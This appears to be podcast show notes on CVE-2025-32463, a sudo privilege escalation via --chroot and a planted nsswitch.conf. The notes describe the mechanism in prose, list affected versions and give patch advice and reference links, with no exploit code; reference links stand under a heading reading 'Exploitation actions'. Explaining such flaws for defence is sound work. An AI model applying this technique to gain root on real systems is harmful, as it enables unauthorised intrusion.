sudo: local privilege escalation in sudo via untrusted /etc/nsswitch.conf with --chroot (CVE-2025-32463) #shorts

Summary

Welcome to CyberPatch Podcast. In today’s episode we’re diving into CVE-2025-32463, a newly disclosed local privilege escalation vulnerability in the widely used Sudo utility. This flaw allows a non-privileged, local user to gain full root access under certain configurations. We’ll walk you through exactly what’s at risk, how it works, and what steps you need to take right now to protect your systems.

Product details

The vulnerability affects Sudo versions prior to 1.9.17p1, including 1.9.14, 1.9.15, and 1.9.16. Sudo is a core component on most Linux distributions and is also bundled with some macOS deployments. Many organizations rely on Sudo to grant controlled administrative privileges to users without giving them full root credentials.

Vulnerability type summary

Classified as CWE-829, this is an “Inclusion of Functionality from Untrusted Control Sphere” issue. In simple terms, Sudo is loading a security-related configuration file—nsswitch.conf—from a location that can be manipulated by an unprivileged user, breaking the trust boundary between system and user control.

Details of the vulnerability

When Sudo is invoked with the -R or --chroot option, it creates a chroot jail for the target process. However, before dropping privileges, Sudo will read /etc/nsswitch.conf from inside the chroot directory. An attacker who can write to a directory used as the chroot path can place a crafted nsswitch.conf file there. By configuring module lookups or resolver behavior in that file, the attacker tricks the system into loading malicious libraries or modules as root, resulting in full root shell execution. This chain exploits the fact that Sudo trusted the chroot directory without validating the contents of nsswitch.conf.

Conclusion

If you’re running Sudo on Linux or macOS, you need to patch immediately. Update to version 1.9.17p1 or later. Review any automation or scripts that use -R/--chroot and lock down file permissions on chroot directories. As always, apply principle of least privilege and monitor sudo logs for unusual activity. Stay safe, and thanks for listening to CyberPatch Podcast.

This chain involves the following actors

• Local user: Attacker with non-privileged shell
• System administrator: Responsible for patching and updates

This following systems are involved

• Target host (Runs sudo for privilege escalation control): Victim system

Attack entry point

• sudo --chroot option: Invoking sudo with a user-writable chroot directory

Remediation actions

Exploitation actions

• https://www.sudo.ws/security/advisories/
• https://www.sudo.ws/releases/changelog/
• https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
• https://www.openwall.com/lists/oss-security/2025/06/30/3
• https://access.redhat.com/security/cve/cve-2025-32463
• https://ubuntu.com/security/notices/USN-7604-1
• https://security-tracker.debian.org/tracker/CVE-2025-32463
• https://explore.alas.aws.amazon.com/CVE-2025-32463.html
• https://bugs.gentoo.org/show_bug.cgi?id=CVE-2025-32463
• https://www.suse.com/support/update/announcement/2025/suse-su-202502177-1/
• https://www.suse.com/security/cve/CVE-2025-32463.html
• [2025-07-02] Article discusses the resolution of Sudo LPE vulnerabilities CVE-2025-32462 and CVE-2025-32463, recommending updates on Linux and macOS systems.
• [2025-06-30] A critical vulnerability in Todd Miller's sudo 1.9.14/1.9.15/1.9.16/1.9.17 allows for privilege escalation via the -R/--chroot argument.
• [2025-07-01] Urgent update needed for Sudo utility to patch local privilege escalation vulnerabilities
• [2025-07-02] New local privilege escalation vulnerabilities, CVE-2025-32462 and CVE-2025-32463, have been identified in the Sudo software, affecting Linux systems.